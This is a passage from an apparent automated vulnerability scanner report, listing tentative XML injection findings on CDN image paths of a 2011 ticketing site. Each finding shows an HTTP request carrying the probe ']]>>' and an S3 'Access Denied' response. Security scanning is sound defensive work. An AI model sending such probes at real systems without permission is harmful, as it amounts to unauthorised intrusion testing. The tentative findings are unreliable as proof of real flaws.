Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2BB157C8B78CD589</RequestId><HostId>iAvVDpnyDCZ4MzEUfrRSYs3FqbeBDd4sGCzDNQKhhnIcJyFXkd
...[SNIP]...

8.27. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-large-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3F54AB3F98BAA6D3
x-amz-id-2: N42HHSpQcCLscS76R6oNgirDkfhNI1EWmSqPLTxhzmh8/3tcArvTJAUvrZnqzFqG
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:35 GMT
Server: AmazonS3
Age: 2
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0f4a214deba06875b21c9b1eb50659547d9a4650f914541f58cb6f528e21555e90ca1a18b634a9e3
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3F54AB3F98BAA6D3</RequestId><HostId>N42HHSpQcCLscS76R6oNgirDkfhNI1EWmSqPLTxhzmh8/3tcAr
...[SNIP]...

8.28. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 609E17216EA78A80
x-amz-id-2: 8XVmOQNXz/KuZ+IWGRlcSxtwQwWrNLfUcL17Xaq2oLgzZIMjBmEMcNNLNZs8Mr2y
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:39 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 03699156bbbea76390c505fab44ba8da9f6cf19491742ef8ff6d561464d5f2eb2d036a66990c9354
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>609E17216EA78A80</RequestId><HostId>8XVmOQNXz/KuZ+IWGRlcSxtwQwWrNLfUcL17Xaq2oLgzZIMjBm
...[SNIP]...

8.29. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BDB9887B90F8B036
x-amz-id-2: Y9abPM1E8NWhmF4KUFckk0oM5RhqdPjjZmm2EacqARyfUQNqhpKps6ZO+7+r2et9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0de9c428da503f1d21036468d985ac2bfbd04e64982dcb370718627ac2e353e0b08d185788b88a3b
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BDB9887B90F8B036</RequestId><HostId>Y9abPM1E8NWhmF4KUFckk0oM5RhqdPjjZmm2EacqARyfUQNqhp
...[SNIP]...

8.30. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FC132F72E152C494
x-amz-id-2: J8kg5IfkmohWGqdH+LIEcRSoPN0QIxvQnAKoqB2krFYhGjSaDYuS+dlONNpqj2eV
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:18 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 766b9fb8eeb43a69b7b79ff71c76b0dd032a2d003283250f6b1cccfe07f97e5b31dbc8487636e66b
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FC132F72E152C494</RequestId><HostId>J8kg5IfkmohWGqdH+LIEcRSoPN0QIxvQnAKoqB2krFYhGjSaDY
...[SNIP]...

8.31. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 57C54B6F1891E5F8
x-amz-id-2: bA7tk7brK0U8t2aMlOiau9bSUXAsapKuyUORh6Bo3Jg+DjM6BLdTZ99wMzWxOn5N
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 95a187b201840e4162aa6ccea252663c5b46de34fc5a912a4ac2f2ff6f72013c103b81abd840b59a
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>57C54B6F1891E5F8</RequestId><HostId>bA7tk7brK0U8t2aMlOiau9bSUXAsapKuyUORh6Bo3Jg+DjM6BL
...[SNIP]...

8.32. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E1A15257D6B5C5C3
x-amz-id-2: 4+S2nDfpzXnOuPf4KRH6Vz0aZA6ScW+zm/Ivwtjowk1TKTGfqozLINH1IwvIX5Vb
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:27 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 477a7bd9d5245cd4bba55c996d3a67374f3f7be63970a75b48218baa4f38c746dad7dae1ba92bc41
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E1A15257D6B5C5C3</RequestId><HostId>4+S2nDfpzXnOuPf4KRH6Vz0aZA6ScW+zm/Ivwtjowk1TKTGfqo
...[SNIP]...

8.33. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-143.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 92F588FE6A1606B1
x-amz-id-2: cNdvVk0crAofLITFTzkmMCpZE3I0LI3z7wdQJ5d4Hf3ThUBPcMPQHoAGs4B2LnXH
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:56 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 980f4787067d46576e5f7b387b4ac1a2feebe92bd804b0da785369e4ab68f61459a2fe34503db929
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>92F588FE6A1606B1</RequestId><HostId>cNdvVk0crAofLITFTzkmMCpZE3I0LI3z7wdQJ5d4Hf3ThUBPcM
...[SNIP]...

8.34. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-143.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 15C362866C433185
x-amz-id-2: Mx0XS7Iqtq1J+ZFzCnI3RQgmfgW67M2/Z1qxgl4egRLAJWoNpQMIOg1nnXUQOayA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3005e9dac3b65a03183d9d675daa791cdf8cb70bdd2d87dad5a5c1ffce89d92d209bec2ad6e1e688
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>15C362866C433185</RequestId><HostId>Mx0XS7Iqtq1J+ZFzCnI3RQgmfgW67M2/Z1qxgl4egRLAJWoNpQ
...[SNIP]...

8.35. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-143.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7747F6A28805E7DD
x-amz-id-2: ALSV2ogncUvm5lCSg9I7LuQrTOO//KjqS1tmOlx5hqvKfe9/cRv2sJTcxAZiK/if
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5c7f2866a9939c2a96316f4261ee643302b8db316d250b3c96703f43e026e55521c8fe6a9a7b2c94
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7747F6A28805E7DD</RequestId><HostId>ALSV2ogncUvm5lCSg9I7LuQrTOO//KjqS1tmOlx5hqvKfe9/cR
...[SNIP]...

8.36. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D430531E0007B09B
x-amz-id-2: DBs4eSsN365WR5oG/4fvYdJEUk/Oraa06ZLXrOkhw3iTTKh6xnCB5Rubqjl2ZL9r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0d7490eede061b51f9f08533f95284c85092e55ba8cdf2005e81985bcb6133aa0d8f8eb7956dc788
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D430531E0007B09B</RequestId><HostId>DBs4eSsN365WR5oG/4fvYdJEUk/Oraa06ZLXrOkhw3iTTKh6xn
...[SNIP]...

8.37. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C4351B348112B89F
x-amz-id-2: mPP/cyYtRJ8fgosz50IObYzVsczG5s/kxiUshww7/GWfo8dUSzT80zaqZL+e0dOV
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 338b71d652b65d9e99dc257f1414a9d6b32cd9283bb1509d179b7378494d9bfef6caa644418a60b9
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C4351B348112B89F</RequestId><HostId>mPP/cyYtRJ8fgosz50IObYzVsczG5s/kxiUshww7/GWfo8dUSz
...[SNIP]...

8.38. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FE038267AF77498A
x-amz-id-2: Aehae73CCvFl5ZzcfGgXmMmaxtp1+JvgoH6E6bjjpMl+03EI+Sx/boFEHhMt7EF+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8d076905a7c725f5a4f7b2acaeff57eb16f4795fcb4b994f6b5a8567dfbc3ac4e553418a9278a12d
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FE038267AF77498A</RequestId><HostId>Aehae73CCvFl5ZzcfGgXmMmaxtp1+JvgoH6E6bjjpMl+03EI+S
...[SNIP]...

8.39. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 32B7864015EEA984
x-amz-id-2: CvAJ/S9CxHtfQNUj7lMhn1MuMpgP03ep/xf0RxAU69BVUt3voPdJm3IShSHln1vZ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 16be052502fa4cd646dc06576f1d2c58c4dcb1fe1aac67d898dab991b6acb85744e74ca3e10b39b6
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>32B7864015EEA984</RequestId><HostId>CvAJ/S9CxHtfQNUj7lMhn1MuMpgP03ep/xf0RxAU69BVUt3voP
...[SNIP]...

